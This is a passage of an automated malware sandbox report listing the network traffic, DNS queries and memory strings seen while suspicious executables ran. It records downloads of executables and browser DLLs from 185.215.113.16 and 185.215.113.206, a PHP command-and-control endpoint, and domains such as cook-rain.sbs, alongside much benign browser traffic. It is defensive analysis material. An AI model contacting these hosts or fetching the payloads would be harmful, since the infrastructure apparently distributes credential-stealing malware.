                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 21 Nov 2024 10:53:57 GMTIf-None-Match: "673f1145-1d6200"
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 21 Nov 2024 10:54:04 GMTIf-None-Match: "673f114c-1b7a00"
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 21 Nov 2024 10:52:12 GMTIf-None-Match: "673f10dc-e1000"
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 21 Nov 2024 10:52:38 GMTIf-None-Match: "673f10f6-2ae600"
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C3703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C3703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C3703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: home.fvtekk5pn.top
                          Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
                          Source: global trafficDNS traffic detected: DNS query: fvtekk5pn.top
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: youtube.com
                          Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                          Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
                          Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: example.org
                          Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
                          Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
                          Source: global trafficDNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: shavar.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
                          Source: global trafficDNS traffic detected: DNS query: support.mozilla.org
                          Source: global trafficDNS traffic detected: DNS query: firefox.settings.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: push.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: services.addons.mozilla.org
                          Source: global trafficDNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: www.youtube.com
                          Source: global trafficDNS traffic detected: DNS query: www.facebook.com
                          Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
                          Source: global trafficDNS traffic detected: DNS query: star-mini.c10r.facebook.com
                          Source: global trafficDNS traffic detected: DNS query: youtube-ui.l.google.com
                          Source: global trafficDNS traffic detected: DNS query: dyna.wikimedia.org
                          Source: global trafficDNS traffic detected: DNS query: www.reddit.com
                          Source: global trafficDNS traffic detected: DNS query: twitter.com
                          Source: global trafficDNS traffic detected: DNS query: reddit.map.fastly.net
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
                          Source: 159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
                          Source: 159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000030.00000003.3216743370.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3058350373.0000000001A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3058350373.0000000001A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/a.
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3058822351.0000000001A67000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019EE000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.3058350373.0000000001A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3058350373.0000000001A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeA/
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3058822351.0000000001A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeV
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3058350373.0000000001A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3058350373.0000000001A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeW/
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/off/def.exe
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmp, a78a39a396.exe, 0000001E.00000002.3249141713.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                          Source: a78a39a396.exe, 0000001E.00000002.3249141713.0000000000B05000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000001E.00000002.3249141713.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                          Source: a78a39a396.exe, 0000001E.00000002.3249141713.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/0
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllqO~
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllW
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllf
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllcOp
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllu
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.00000000019C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dlle
                          Source: a78a39a396.exe, 0000001E.00000002.3249141713.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.FileTypeAssociation
                          Source: a78a39a396.exe, 0000001E.00000002.3249141713.0000000000B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
                          Source: a78a39a396.exe, 0000001E.00000002.3249141713.0000000000B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/s
                          Source: a78a39a396.exe, 0000000A.00000002.3262207220.0000000023F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php=
                          Source: a78a39a396.exe, 0000000A.00000002.3262207220.0000000023F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC
                          Source: a78a39a396.exe, 0000001E.00000002.3249141713.0000000000B05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpP
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
                          Source: a78a39a396.exe, 0000000A.00000002.3262207220.0000000023F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp3
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: http://185.215.113.206Local
                          Source: a78a39a396.exe, 0000001E.00000002.3249141713.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206g
                          Source: firefox.exe, 00000030.00000003.3143732764.000001E57D354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
                          Source: firefox.exe, 00000030.00000003.3143732764.000001E57D354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
                          Source: firefox.exe, 00000030.00000003.3143732764.000001E57D354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
                          Source: firefox.exe, 00000030.00000003.3143732764.000001E57D354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                          Source: chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
